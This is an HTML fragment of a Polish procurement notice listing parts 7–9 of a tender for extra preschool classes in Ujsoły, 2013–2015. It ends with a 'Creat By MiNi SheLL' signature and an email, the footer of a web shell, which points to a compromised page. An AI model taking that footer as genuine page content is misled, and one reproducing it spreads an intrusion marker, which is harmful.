<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zajęcia dodatkowe ekologiczne Mały przyrodnik prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych ekologicznych Mały przyrodnik dla dzieci w wieku od 3 do 6 lat w 10 grupach od 10 - 15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013 r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 300 (60 tygodni x 10 grup x 0,5 godziny) w tym: 40 godzin w 2013 r., 170 godzin w 2014 r., 90 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 30 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zajęcia dodatkowe Europejczyk to ja prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych Europejczyk to ja dla dzieci w wieku od 3 do 6 lat w 5 grupach od 10 - 15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013 r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 300 (60 tygodni x 5 grup x 1 godzina) w tym: 40 godzin w 2013 r., 170 godzin w 2014 r., 90 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 60 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zajęcia korekcyjno - kompensacyjne prowadzone z dziećmi w wieku 3-6 lat w Przedszkolu w Ujsołach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacja zajęć dodatkowych korekcyjno - kompensacyjnych dla dzieci w wieku od 3 do 6 lat w 5 grupach od 10-15 osobowych w Przedszkolu w Ujsołach w okresie od października 2013 r. do 30 czerwca 2015 r. poza podstawą programową. Łączna ilość godzin 300 (60 tygodni x 5 grup x 1 godzina) w tym: 40 godzin w 2013 r., 170 godzin w 2014 r., 90 godzin w 2015 r. Godziny przypadające na grupy rozkładają się równomiernie tj. 60 godzin na grupę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com